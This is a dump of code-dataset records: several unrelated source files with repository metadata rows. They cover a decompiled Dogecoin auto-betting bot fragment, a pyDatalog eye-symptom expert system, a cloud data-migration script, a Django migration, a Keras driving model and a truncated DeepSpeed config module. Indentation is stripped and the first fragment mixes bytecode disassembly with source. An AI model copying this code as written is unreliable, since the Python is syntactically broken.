2030 JUMP_FORWARD 28 (to 2060)
662 >> 2032 LOAD_NAME 98 (smenu)
2034 LOAD_CONST 36 ('0')
2036 COMPARE_OP 2 (==)
2038 EXTENDED_ARG 8
2040 POP_JUMP_IF_FALSE 2052
663 2042 LOAD_NAME 1 (sys)
2044 LOAD_METHOD 36 (exit)
2046 CALL_METHOD 0
2048 POP_TOP
2050 JUMP_FORWARD 8 (to 2060)
665 >> 2052 LOAD_NAME 35 (print)
2054 LOAD_CONST 169 ('NO MENU SELECTED')
2056 CALL_FUNCTION 1
2058 POP_TOP
>> 2060 EXTENDED_ARG 3
2062 JUMP_ABSOLUTE 910
try:
if Expired <= 0:
print(merah + 'License Out of Date' + putih)
print(kuning + 'Buy New One' + putih)
sys.exit()
else:
pass
except:
pass
else:
print('Informasi Status Login :', hijau + statslogin + putih)
print('Account ID :', accid)
print('Username :', Username)
print('Doge Balance :', num_format(dogebalance))
print('Doge Deposit Wallet :', dogewallet)
print('License Type : ', logintype)
if logintype == 'Free License':
statssrv = 'Offline'
print('Expired Date : None')
print('SG Server Status :', merah + statssrv + putih)
print('Max Balance : 150 DOGE')
else:
if not logintype == 'Premium License':
if logintype == 'Platinum License':
pass
statssrv = 'Online'
mydatetime = datetime.now()
print('SG Server Status :', hijau + statssrv + putih)
print('Date :', mydatetime.strftime('%Y-%m-%d'))
print('Expired Date :', userdate)
print('Expired In :', Expired, 'Days')
print('Max Balance : Unlimited')
print('Currency Available : DOGE')
print('Information Status Login :', statslogin)
print(hijau + '\nPilih Menu :')
print(kuning + '1. Login Premium License')
print('2. Login For Free')
print('3. Login Platinum License')
print('4. Register Account SELENIA')
print('5. Price List License')
print('0. Keluar')
if statslogin == 'Online':
print('6. Start Trade')
print('7. Withdraw')
print('8. Account Information')
smenu = input('==>')
if smenu == '1':
limit = 0
logintype = 'Premium License'
login()
verify()
check_license()
if smenu == '2':
logintype = 'Free License'
login()
limit = dogebalance
verify()
if smenu == '3':
limit = 0
logintype = 'Platinum License'
login()
verify()
check_license_platinum()
if smenu == '4':
register()
if smenu == '6':
if statslogin == 'Online':
if logintype == 'Free License':
gblnc()
limit = dogebalance
else:
pass
autobet(limit)
if smenu == '5':
harga_license()
if smenu == '7':
if statslogin == 'Online':
withdraw()
if smenu == '8':
if statslogin == 'Online':
ainfo()
if smenu == '0':
sys.exit()
print('NO MENU SELECTED')
667 >> 2064 LOAD_CONST 1 (None)
2066 RETURN_VALUE
| [
"noreply@github.com"
] | rendy026.noreply@github.com |
b9250a89c4f9d1cd4dad23020d9237cf7c64330c | b2506ad4d4800bbc6c618619d29cc6f5c3a4838d | /yeux_symptomes.py | d71b602fab3d658b9f46f42aefa07d3fc0f425f4 | [] | no_license | EDU-FRANCK-JUBIN/exos-systeme-expert-SiegKord | 4f6ed358e557218902585fdc045a3f7039067154 | c242ef7085f7a13fcf915fede8c92bca5108c3f6 | refs/heads/master | 2020-09-21T16:57:51.720379 | 2019-12-05T22:15:16 | 2019-12-05T22:15:16 | 224,857,316 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,633 | py | # -*- coding: utf-8 -*-
"""
Created on Thu Dec 5 15:51:33 2019
@author: Nicolas
"""
from pyDatalog import pyDatalog
pyDatalog.clear()
pyDatalog.create_terms('X, G001, G002, G003, G004, G005, G006, G007, G008, G009, G010, G011, G012, G013, G014, G015, G016, G017, G018, G019, G020, G021, G022, G023, P01, P02, P03, P04, P05, P06, P07, P08')
'''
P0X : Maladies
G0XX : Symptômes
'''
P01(X) <= G001(X) & G002(X) & G003(X) & G004(X)
P02(X) <= G001(X) & G002(X) & G005(X) & G006(X)
P03(X) <= G007(X) & G008(X)
P04(X) <= G009(X) & G010(X) & G011(X) & G012(X)
P05(X) <= G013(X) & G014(X) & G015(X) & G016(X)
P06(X) <= G010(X) & G015(X) & G016(X) & G017(X) & G018(X) & G019(X)
P07(X) <= G010(X) & G019(X) & G020(X) & G021(X)
P08(X) <= G001(X) & G010(X) & G019(X) & G022(X) & G023(X)
+G001('default')
+G002('default')
+G003('default')
+G004('default')
+G005('default')
+G006('default')
+G007('default')
+G008('default')
+G009('default')
+G010('default')
+G011('default')
+G012('default')
+G013('default')
+G014('default')
+G015('default')
+G016('default')
+G017('default')
+G018('default')
+G019('default')
+G020('default')
+G021('default')
+G022('default')
+G023('default')
+G013('Personne1')
+G014('Personne1')
+G015('Personne1')
+G016('Personne1')
+G010('Personne2')
+G015('Personne2')
+G016('Personne2')
+G017('Personne2')
+G018('Personne2')
+G019('Personne2')
'''
Qui a la maladie de "Conjonctiviste en allergie ?
'''
print(pyDatalog.ask('P05(X)'))
'''
Qui a la maladie de la Blépharite ?
'''
print(pyDatalog.ask('P01(X)'))
'''
Quel patient souffre du symptôme "Yeux qui brillent ?"
'''
print(pyDatalog.ask('G016(X)'))
| [
"nicolas.ferrer@ynov.com"
] | nicolas.ferrer@ynov.com |
20a59d30363f13db08a271bd7d4156a4795b5037 | 9fa71d5834dae1c8900b3444f564b11326374d36 | /packages/ipm_cloud_postgresql/folha/rotinas_envio/tipo-afastamento.py | 81f76c9ccfb467f9f87b432e8845eb17d8d9c18f | [] | no_license | JoaoPauloLeal/toolbox | a85e726cfeb74603cb64d73c4af64757a9a60db7 | 924c063ba81395aeddc039a51f8365c02e527963 | refs/heads/master | 2023-06-07T02:17:42.069985 | 2021-06-28T19:06:40 | 2021-06-28T19:06:40 | 381,128,045 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,411 | py | import packages.ipm_cloud_postgresql.model as model
import bth.interacao_cloud as interacao_cloud
import json
import logging
from datetime import datetime
tipo_registro = 'tipo-afastamento'
sistema = 300
limite_lote = 500
url = "https://pessoal.cloud.betha.com.br/service-layer/v1/api/tipo-afastamento"
def iniciar_processo_envio(params_exec, *args, **kwargs):
dados_assunto = coletar_dados(params_exec)
dados_enviar = pre_validar(params_exec, dados_assunto)
if not params_exec.get('somente_pre_validar'):
iniciar_envio(params_exec, dados_enviar, 'POST')
model.valida_lotes_enviados(params_exec, tipo_registro=tipo_registro)
def coletar_dados(params_exec):
print('- Iniciando a consulta dos dados a enviar.')
df = None
try:
query = model.get_consulta(params_exec, tipo_registro + '.sql')
pgcnn = model.PostgreSQLConnection()
df = pgcnn.exec_sql(query, index_col='id')
print(f'- Consulta finalizada. {len(df.index)} registro(s) encontrado(s).')
except Exception as error:
print(f'Erro ao executar função {tipo_registro}. {error}')
finally:
return df
def pre_validar(params_exec, dados):
print('- Iniciando pré-validação dos registros.')
dados_validados = []
registro_erros = []
try:
lista_dados = dados.to_dict('records')
for linha in lista_dados:
registro_valido = True
if registro_valido:
dados_validados.append(linha)
print(f'- Pré-validação finalizada. Registros validados com sucesso: '
f'{len(dados_validados)} | Registros com advertência: {len(registro_erros)}')
except Exception as error:
logging.error(f'Erro ao executar função "pre_validar". {error}')
finally:
return dados_validados
def iniciar_envio(params_exec, dados, metodo, *args, **kwargs):
print('- Iniciando envio dos dados.')
lista_dados_enviar = []
lista_controle_migracao = []
hoje = datetime.now().strftime("%Y-%m-%d")
token = params_exec['token']
contador = 0
for item in dados:
hash_chaves = model.gerar_hash_chaves(sistema, tipo_registro, item['id_entidade'], item['codigo'])
dict_dados = {
'idIntegracao': hash_chaves,
'conteudo': {
'descricao': None if 'descricao' not in item else item['descricao'],
'classificacao': None if 'classificacao' not in item else item['classificacao'],
'tipoMovimentacaoPessoal': None if 'tipomovimentacaopessoal' not in item else item['tipomovimentacaopessoal'],
'diasPrevistos': None if 'diasprevistos' not in item else item['diasprevistos'],
'perdeTempoServico': None if 'perdetemposervico' not in item else item['perdetemposervico'],
'consideraVencimento': None if 'consideravencimento' not in item else item['consideravencimento'],
'reduz13Salario': None if 'reduz13salario' not in item else item['reduz13salario'],
'reduzFerias': None if 'reduzferias' not in item else item['reduzferias'],
'justificado': None if 'justificado' not in item else item['justificado'],
'reduzFgts': None if 'reduzfgts' not in item else item['reduzfgts']
}
}
contador += 1
print(f'Dados gerados ({contador}): ', dict_dados)
lista_dados_enviar.append(dict_dados)
lista_controle_migracao.append({
'sistema': sistema,
'tipo_registro': tipo_registro,
'hash_chave_dsk': hash_chaves,
'descricao_tipo_registro': 'Cadastro de Tipo de Afastamento',
'id_gerado': None,
'i_chave_dsk1': item['id_entidade'],
'i_chave_dsk2': item['codigo']
})
if True:
model.insere_tabela_controle_migracao_registro2(params_exec, lista_req=lista_controle_migracao)
req_res = interacao_cloud.preparar_requisicao(lista_dados=lista_dados_enviar,
token=token,
url=url,
tipo_registro=tipo_registro,
tamanho_lote=limite_lote)
model.insere_tabela_controle_lote(req_res)
print('- Envio de dados finalizado.') | [
"joao.leal@betha.com.br"
] | joao.leal@betha.com.br |
89f75ed219421260a08f7f0fe6a80bf48514550a | b8b82e0723c681ab16578ce8e0e5389384fb2a2a | /Trivia Quiz Project/djangoproject/quizsite/quiz/migrations/0019_auto_20180617_1342.py | 7b3598bfba32f4d33e1675986c1c0b395b68e318 | [] | no_license | ml-barnes/django-project | 88a9dd008c761f53431a189b8b1c81c7b39ef35f | 3e2263bfb790466abf55ab396713bfd9032d014c | refs/heads/master | 2020-03-29T01:15:54.961683 | 2018-09-19T02:55:32 | 2018-09-19T02:55:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 476 | py | # Generated by Django 2.0.3 on 2018-06-17 01:42
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('quiz', '0018_auto_20180617_1341'),
]
operations = [
migrations.AlterField(
model_name='quiz',
name='difficulty',
field=models.CharField(choices=[('', 'No preference'), ('E', 'easy'), ('M', 'medium'), ('H', 'hard')], default='', max_length=2),
),
]
| [
"barnm7@student.op.ac.nz"
] | barnm7@student.op.ac.nz |
0f91441b9043d804d08893814aadd439963285a9 | d50807442176f08bc6e1a6a905f4158e3a14f94e | /model.py | f11c9d044a475f106cc34adf806e79c805f7ef05 | [] | no_license | rout-sarthak/P3-U-sdcnd-Behavorial-Cloning | ec76cb96eeabf7bb12ba831234ec8767df492914 | e5ebd575e1116f30e217c235d1b3d0b2a68c37b8 | refs/heads/master | 2020-06-19T14:17:22.416874 | 2019-07-13T16:07:05 | 2019-07-13T16:07:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,461 | py | import tensorflow as tf
from keras.layers import Dense, Flatten, Lambda, Activation, MaxPooling2D
from keras.layers.convolutional import Convolution2D
from keras.models import Sequential
from keras.optimizers import Adam
import helper
epochs = 8
epoch_samples = 20032
learning_rate = 1e-4
validation_set = 6400
activate_relu = 'relu'
tf.python.control_flow_ops = tf
# NVIDIA's "End to End Learning for Self-Driving Cars" paper was used for developing this model https://images.nvidia.com/content/tegra/automotive/images/2016/solutions/pdf/end-to-end-dl-using-px.pdf
model = Sequential()
model.add(Lambda(lambda x: x / 127.5 - 1.0, input_shape=(64, 64, 3)))
# The first five convolutional and maxpooling layers
model.add(Convolution2D(24, 5, 5, border_mode='same', subsample=(2, 2)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(36, 5, 5, border_mode='same', subsample=(2, 2)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(48, 5, 5, border_mode='same', subsample=(2, 2)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(64, 3, 3, border_mode='same', subsample=(1, 1)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Convolution2D(64, 3, 3, border_mode='same', subsample=(1, 1)))
model.add(Activation(activate_relu))
model.add(MaxPooling2D(pool_size=(2, 2), strides=(1, 1)))
model.add(Flatten())
# Next, five fully connected layers
model.add(Dense(1164))
model.add(Activation(activate_relu))
model.add(Dense(100))
model.add(Activation(activate_relu))
model.add(Dense(50))
model.add(Activation(activate_relu))
model.add(Dense(10))
model.add(Activation(activate_relu))
model.add(Dense(1))
model.summary()
model.compile(optimizer=Adam(learning_rate), loss="mse", )
# separate generators for training and validation
train_gen = helper.generate_next_batch()
validation_gen = helper.generate_next_batch()
history = model.fit_generator(train_gen,
samples_per_epoch=epoch_samples,
nb_epoch=epochs,
validation_data=validation_gen,
nb_val_samples=validation_set,
verbose=1)
helper.save_model(model) #saving model and weights
| [
"noreply@github.com"
] | rout-sarthak.noreply@github.com |
e486a8fff0f2ff861e17eeb4ef823779cde18389 | 870143dccb3ced8fb2095f989cb7eef5787c0489 | /deepspeed/runtime/config.py | 26c10f3b0e350e97257bf65528d7145fa8b2bc90 | [
"LicenseRef-scancode-generic-cla",
"MIT"
] | permissive | tanghl1994/DeepSpeed | 56650ecd59184dae643d3a9ed6bb3d0406d6521a | 509ccbf4d8769b145aa1608f97b49c0f29ccc6cf | refs/heads/master | 2022-12-20T18:35:14.783378 | 2020-09-09T19:21:11 | 2020-09-09T19:21:11 | 293,631,664 | 0 | 0 | null | 2020-09-07T21:01:38 | 2020-09-07T21:01:37 | null | UTF-8 | Python | false | false | 26,476 | py | """
Copyright (c) Microsoft Corporation
Licensed under the MIT license.
"""
import torch
import json
import copy
from deepspeed.runtime.constants import *
from deepspeed.runtime.fp16.loss_scaler import INITIAL_LOSS_SCALE, SCALE_WINDOW, DELAYED_SHIFT, MIN_LOSS_SCALE
from deepspeed.runtime.config_utils import get_scalar_param, dict_raise_error_on_duplicate_keys
from deepspeed.runtime.zero.config import DeepSpeedZeroConfig
from deepspeed.runtime.activation_checkpointing.config import DeepSpeedActivationCheckpointingConfig
from deepspeed.utils import logger
TENSOR_CORE_ALIGN_SIZE = 8
ADAM_OPTIMIZER = 'adam'
LAMB_OPTIMIZER = 'lamb'
DEEPSPEED_OPTIMIZERS = [ADAM_OPTIMIZER, LAMB_OPTIMIZER]
def get_amp_enabled(param_dict):
if AMP in param_dict.keys():
return get_scalar_param(param_dict[AMP], AMP_ENABLED, AMP_ENABLED_DEFAULT)
else:
return False
def get_amp_params(param_dict):
if AMP in param_dict.keys():
amp_params = copy.copy(param_dict[AMP])
amp_params.pop(AMP_ENABLED)
return amp_params
else:
return False
def get_fp16_enabled(param_dict):
if FP16 in param_dict.keys():
return get_scalar_param(param_dict[FP16], FP16_ENABLED, FP16_ENABLED_DEFAULT)
else:
return False
def get_loss_scale(param_dict):
if get_fp16_enabled(param_dict):
return get_scalar_param(param_dict[FP16],
FP16_LOSS_SCALE,
FP16_LOSS_SCALE_DEFAULT)
else:
return FP16_LOSS_SCALE_DEFAULT
def get_initial_dynamic_scale(param_dict):
if get_fp16_enabled(param_dict):
initial_scale_power = get_scalar_param(param_dict[FP16],
FP16_INITIAL_SCALE_POWER,
FP16_INITIAL_SCALE_POWER_DEFAULT)
else:
initial_scale_power = FP16_INITIAL_SCALE_POWER_DEFAULT
return 2**initial_scale_power
def get_dynamic_loss_scale_args(param_dict):
loss_scale_args = None
if get_fp16_enabled(param_dict):
fp16_dict = param_dict[FP16]
dynamic_loss_args = [
FP16_INITIAL_SCALE_POWER,
FP16_LOSS_SCALE_WINDOW,
FP16_MIN_LOSS_SCALE,
FP16_HYSTERESIS
]
if any(arg in list(fp16_dict.keys()) for arg in dynamic_loss_args):
init_scale = get_scalar_param(fp16_dict,
FP16_INITIAL_SCALE_POWER,
FP16_INITIAL_SCALE_POWER_DEFAULT)
scale_window = get_scalar_param(fp16_dict,
FP16_LOSS_SCALE_WINDOW,
FP16_LOSS_SCALE_WINDOW_DEFAULT)
delayed_shift = get_scalar_param(fp16_dict,
FP16_HYSTERESIS,
FP16_HYSTERESIS_DEFAULT)
min_loss_scale = get_scalar_param(fp16_dict,
FP16_MIN_LOSS_SCALE,
FP16_MIN_LOSS_SCALE_DEFAULT)
loss_scale_args = {
INITIAL_LOSS_SCALE: 2**init_scale,
SCALE_WINDOW: scale_window,
DELAYED_SHIFT: delayed_shift,
MIN_LOSS_SCALE: min_loss_scale
}
return loss_scale_args
def get_gradient_accumulation_steps(param_dict):
return get_scalar_param(param_dict,
GRADIENT_ACCUMULATION_STEPS,
GRADIENT_ACCUMULATION_STEPS_DEFAULT)
def get_sparse_gradients_enabled(param_dict):
return get_scalar_param(param_dict, SPARSE_GRADIENTS, SPARSE_GRADIENTS_DEFAULT)
def get_zero_optimization(param_dict):
return get_scalar_param(param_dict, ZERO_OPTIMIZATION, ZERO_OPTIMIZATION_DEFAULT)
def get_zero_reduce_scatter(param_dict):
return get_scalar_param(param_dict, ZERO_REDUCE_SCATTER, ZERO_REDUCE_SCATTER_DEFAULT)
def get_zero_max_elements_per_comm(param_dict):
return get_scalar_param(param_dict,
ZERO_MAX_ELEMENTS_PER_COMM,
ZERO_MAX_ELEMENTS_PER_COMM_DEFAULT)
def get_allgather_size(param_dict):
return get_scalar_param(param_dict,
ALLGATHER_SIZE,
ALLGATHER_SIZE_DEFAULT) if get_scalar_param(
param_dict,
ALLGATHER_SIZE,
ALLGATHER_SIZE_DEFAULT) > 0 else ALLGATHER_SIZE_DEFAULT
def get_allreduce_always_fp32(param_dict):
return get_scalar_param(param_dict, FP32_ALLREDUCE, FP32_ALLREDUCE_DEFAULT)
def get_prescale_gradients(param_dict):
return get_scalar_param(param_dict, PRESCALE_GRADIENTS, PRESCALE_GRADIENTS_DEFAULT)
def get_gradient_predivide_factor(param_dict):
return get_scalar_param(param_dict,
GRADIENT_PREDIVIDE_FACTOR,
GRADIENT_PREDIVIDE_FACTOR_DEFAULT)
def get_steps_per_print(param_dict):
return get_scalar_param(param_dict, STEPS_PER_PRINT, STEPS_PER_PRINT_DEFAULT)
def get_disable_allgather(param_dict):
return get_scalar_param(param_dict, DISABLE_ALLGATHER, DISABLE_ALLGATHER_DEFAULT)
def get_dump_state(param_dict):
return get_scalar_param(param_dict, DUMP_STATE, DUMP_STATE_DEFAULT)
def get_gradient_clipping(param_dict):
return get_scalar_param(param_dict, GRADIENT_CLIPPING, GRADIENT_CLIPPING_DEFAULT)
def get_sparse_attention(param_dict):
if SPARSE_ATTENTION in param_dict.keys():
sparsity = param_dict[SPARSE_ATTENTION]
mode = get_sparse_attention_mode(sparsity)
if (mode == SPARSE_DENSE_MODE):
return get_sparse_dense_config(sparsity)
elif (mode == SPARSE_FIXED_MODE):
return get_sparse_fixed_config(sparsity)
elif (mode == SPARSE_VARIABLE_MODE):
return get_sparse_variable_config(sparsity)
elif (mode == SPARSE_BIGBIRD_MODE):
return get_sparse_bigbird_config(sparsity)
elif (mode == SPARSE_BSLONGFORMER_MODE):
return get_sparse_bslongformer_config(sparsity)
else:
raise NotImplementedError(
f'Given sparsity mode, {mode}, has not been implemented yet!')
else:
return None
def get_sparse_dense_config(sparsity):
block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
return {SPARSE_MODE: SPARSE_DENSE_MODE, SPARSE_BLOCK: block}
def get_sparse_fixed_config(sparsity):
block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
different_layout_per_head = get_scalar_param(
sparsity,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
num_local_blocks = get_scalar_param(sparsity,
SPARSE_NUM_LOCAL_BLOCKS,
SPARSE_NUM_LOCAL_BLOCKS_DEFAULT)
num_global_blocks = get_scalar_param(sparsity,
SPARSE_NUM_GLOBAL_BLOCKS,
SPARSE_NUM_GLOBAL_BLOCKS_DEFAULT)
attention = get_scalar_param(sparsity,
SPARSE_ATTENTION_TYPE,
SPARSE_ATTENTION_TYPE_DEFAULT)
horizontal_global_attention = get_scalar_param(
sparsity,
SPARSE_HORIZONTAL_GLOBAL_ATTENTION,
SPARSE_HORIZONTAL_GLOBAL_ATTENTION_DEFAULT)
num_different_global_patterns = get_scalar_param(
sparsity,
SPARSE_NUM_DIFFERENT_GLOBAL_PATTERNS,
SPARSE_NUM_DIFFERENT_GLOBAL_PATTERNS_DEFAULT)
return {
SPARSE_MODE: SPARSE_FIXED_MODE,
SPARSE_BLOCK: block,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
SPARSE_NUM_LOCAL_BLOCKS: num_local_blocks,
SPARSE_NUM_GLOBAL_BLOCKS: num_global_blocks,
SPARSE_ATTENTION_TYPE: attention,
SPARSE_HORIZONTAL_GLOBAL_ATTENTION: horizontal_global_attention,
SPARSE_NUM_DIFFERENT_GLOBAL_PATTERNS: num_different_global_patterns
}
def get_sparse_variable_config(sparsity):
block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
different_layout_per_head = get_scalar_param(
sparsity,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
num_random_blocks = get_scalar_param(sparsity,
SPARSE_NUM_RANDOM_BLOCKS,
SPARSE_NUM_RANDOM_BLOCKS_DEFAULT)
local_window_blocks = get_scalar_param(sparsity,
SPARSE_LOCAL_WINDOW_BLOCKS,
SPARSE_LOCAL_WINDOW_BLOCKS_DEFAULT)
global_block_indices = get_scalar_param(sparsity,
SPARSE_GLOBAL_BLOCK_INDICES,
SPARSE_GLOBAL_BLOCK_INDICES_DEFAULT)
global_block_end_indices = get_scalar_param(sparsity,
SPARSE_GLOBAL_BLOCK_END_INDICES,
SPARSE_GLOBAL_BLOCK_END_INDICES_DEFAULT)
attention = get_scalar_param(sparsity,
SPARSE_ATTENTION_TYPE,
SPARSE_ATTENTION_TYPE_DEFAULT)
horizontal_global_attention = get_scalar_param(
sparsity,
SPARSE_HORIZONTAL_GLOBAL_ATTENTION,
SPARSE_HORIZONTAL_GLOBAL_ATTENTION_DEFAULT)
return {
SPARSE_MODE: SPARSE_VARIABLE_MODE,
SPARSE_BLOCK: block,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
SPARSE_NUM_RANDOM_BLOCKS: num_random_blocks,
SPARSE_LOCAL_WINDOW_BLOCKS: local_window_blocks,
SPARSE_GLOBAL_BLOCK_INDICES: global_block_indices,
SPARSE_GLOBAL_BLOCK_END_INDICES: global_block_end_indices,
SPARSE_ATTENTION_TYPE: attention,
SPARSE_HORIZONTAL_GLOBAL_ATTENTION: horizontal_global_attention
}
def get_sparse_bigbird_config(sparsity):
block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
different_layout_per_head = get_scalar_param(
sparsity,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
num_random_blocks = get_scalar_param(sparsity,
SPARSE_NUM_RANDOM_BLOCKS,
SPARSE_NUM_RANDOM_BLOCKS_DEFAULT)
num_sliding_window_blocks = get_scalar_param(
sparsity,
SPARSE_NUM_SLIDING_WINDOW_BLOCKS,
SPARSE_NUM_SLIDING_WINDOW_BLOCKS_DEFAULT)
num_global_blocks = get_scalar_param(sparsity,
SPARSE_NUM_GLOBAL_BLOCKS,
SPARSE_NUM_GLOBAL_BLOCKS_DEFAULT)
return {
SPARSE_MODE: SPARSE_BIGBIRD_MODE,
SPARSE_BLOCK: block,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
SPARSE_NUM_RANDOM_BLOCKS: num_random_blocks,
SPARSE_NUM_SLIDING_WINDOW_BLOCKS: num_sliding_window_blocks,
SPARSE_NUM_GLOBAL_BLOCKS: num_global_blocks
}
def get_sparse_bslongformer_config(sparsity):
block = get_scalar_param(sparsity, SPARSE_BLOCK, SPARSE_BLOCK_DEFAULT)
different_layout_per_head = get_scalar_param(
sparsity,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD_DEFAULT)
num_sliding_window_blocks = get_scalar_param(
sparsity,
SPARSE_NUM_SLIDING_WINDOW_BLOCKS,
SPARSE_NUM_SLIDING_WINDOW_BLOCKS_DEFAULT)
global_block_indices = get_scalar_param(sparsity,
SPARSE_GLOBAL_BLOCK_INDICES,
SPARSE_GLOBAL_BLOCK_INDICES_DEFAULT)
global_block_end_indices = get_scalar_param(sparsity,
SPARSE_GLOBAL_BLOCK_END_INDICES,
SPARSE_GLOBAL_BLOCK_END_INDICES_DEFAULT)
return {
SPARSE_MODE: SPARSE_BSLONGFORMER_MODE,
SPARSE_BLOCK: block,
SPARSE_DIFFERENT_LAYOUT_PER_HEAD: different_layout_per_head,
SPARSE_NUM_SLIDING_WINDOW_BLOCKS: num_sliding_window_blocks,
SPARSE_GLOBAL_BLOCK_INDICES: global_block_indices,
SPARSE_GLOBAL_BLOCK_END_INDICES: global_block_end_indices
}
def get_sparse_attention_mode(param_dict):
if SPARSE_MODE in param_dict.keys():
return param_dict[SPARSE_MODE]
else:
return SPARSE_MODE_DEFAULT
def get_sparse_attention_type(param_dict):
if SPARSE_ATTENTION_TYPE in param_dict.keys():
return param_dict[SPARSE_ATTENTION_TYPE]
else:
return SPARSE_ATTENTION_TYPE_DEFAULT
def get_optimizer_name(param_dict):
if OPTIMIZER in param_dict.keys() and \
TYPE in param_dict[OPTIMIZER].keys():
return param_dict[OPTIMIZER][TYPE]
else:
return OPTIMIZER_TYPE_DEFAULT
def get_optimizer_params(param_dict):
if get_optimizer_name(param_dict) is not None and \
OPTIMIZER_PARAMS in param_dict[OPTIMIZER].keys():
return param_dict[OPTIMIZER][OPTIMIZER_PARAMS]
else:
return None
def get_optimizer_gradient_clipping(param_dict):
optimizer_params = get_optimizer_params(param_dict)
if optimizer_params is not None and \
MAX_GRAD_NORM in optimizer_params.keys():
return optimizer_params[MAX_GRAD_NORM]
else:
return None
def get_optimizer_legacy_fusion(param_dict):
if OPTIMIZER in param_dict.keys() and \
LEGACY_FUSION in param_dict[OPTIMIZER].keys():
return param_dict[OPTIMIZER][LEGACY_FUSION]
else:
return LEGACY_FUSION_DEFAULT
def get_zero_allow_untested_optimizer(param_dict):
return get_scalar_param(param_dict,
ZERO_ALLOW_UNTESTED_OPTIMIZER,
ZERO_ALLOW_UNTESTED_OPTIMIZER_DEFAULT)
def get_scheduler_name(param_dict):
if SCHEDULER in param_dict.keys() and \
TYPE in param_dict[SCHEDULER].keys():
return param_dict[SCHEDULER][TYPE]
else:
return SCHEDULER_TYPE_DEFAULT
def get_scheduler_params(param_dict):
if get_scheduler_name(param_dict) is not None and \
SCHEDULER_PARAMS in param_dict[SCHEDULER].keys():
return param_dict[SCHEDULER][SCHEDULER_PARAMS]
else:
return None
def get_train_batch_size(param_dict):
return get_scalar_param(param_dict, TRAIN_BATCH_SIZE, TRAIN_BATCH_SIZE_DEFAULT)
def get_train_micro_batch_size_per_gpu(param_dict):
return get_scalar_param(param_dict,
TRAIN_MICRO_BATCH_SIZE_PER_GPU,
TRAIN_MICRO_BATCH_SIZE_PER_GPU_DEFAULT)
def get_wall_clock_breakdown(param_dict):
return get_scalar_param(param_dict,
WALL_CLOCK_BREAKDOWN,
WALL_CLOCK_BREAKDOWN_DEFAULT)
def get_memory_breakdown(param_dict):
return get_scalar_param(param_dict, MEMORY_BREAKDOWN, MEMORY_BREAKDOWN_DEFAULT)
def get_tensorboard_enabled(param_dict):
if TENSORBOARD in param_dict.keys():
return get_scalar_param(param_dict[TENSORBOARD],
TENSORBOARD_ENABLED,
TENSORBOARD_ENABLED_DEFAULT)
else:
return False
def get_tensorboard_output_path(param_dict):
if get_tensorboard_enabled(param_dict):
return get_scalar_param(param_dict[TENSORBOARD],
TENSORBOARD_OUTPUT_PATH,
TENSORBOARD_OUTPUT_PATH_DEFAULT)
else:
return TENSORBOARD_OUTPUT_PATH_DEFAULT
def get_tensorboard_job_name(param_dict):
if get_tensorboard_enabled(param_dict):
return get_scalar_param(param_dict[TENSORBOARD],
TENSORBOARD_JOB_NAME,
TENSORBOARD_JOB_NAME_DEFAULT)
else:
return TENSORBOARD_JOB_NAME_DEFAULT
'''Write deepspeed config files by modifying basic templates.
Can be used for quicly changing parameters via command line parameters.'''
class DeepSpeedConfigWriter:
def __init__(self, data=None):
self.data = data if data is not None else {}
def add_config(self, key, value):
self.data[key] = value
def load_config(self, filename):
self.data = json.load(open(filename,
'r'),
object_pairs_hook=dict_raise_error_on_duplicate_keys)
def write_config(self, filename):
with open(filename, 'w') as outfile:
json.dump(self.data, outfile)
class DeepSpeedConfig(object):
def __init__(self, json_file, mpu=None, param_dict=None):
super(DeepSpeedConfig, self).__init__()
if param_dict is None:
self._param_dict = json.load(
open(json_file,
'r'),
object_pairs_hook=dict_raise_error_on_duplicate_keys)
else:
self._param_dict = param_dict
try:
self.global_rank = torch.distributed.get_rank()
if mpu is None:
self.world_size = torch.distributed.get_world_size()
else:
self.world_size = mpu.get_data_parallel_world_size()
except:
self.global_rank = 0
self.world_size = 1
self._initialize_params(self._param_dict)
self._configure_train_batch_size()
self._do_sanity_check()
def _initialize_params(self, param_dict):
self.train_batch_size = get_train_batch_size(param_dict)
self.train_micro_batch_size_per_gpu = get_train_micro_batch_size_per_gpu(
param_dict)
self.gradient_accumulation_steps = get_gradient_accumulation_steps(param_dict)
self.steps_per_print = get_steps_per_print(param_dict)
self.dump_state = get_dump_state(param_dict)
self.disable_allgather = get_disable_allgather(param_dict)
self.allreduce_always_fp32 = get_allreduce_always_fp32(param_dict)
self.prescale_gradients = get_prescale_gradients(param_dict)
self.gradient_predivide_factor = get_gradient_predivide_factor(param_dict)
self.sparse_gradients_enabled = get_sparse_gradients_enabled(param_dict)
self.allgather_size = get_allgather_size(param_dict)
self.zero_config = DeepSpeedZeroConfig(param_dict)
self.zero_optimization_stage = self.zero_config.stage
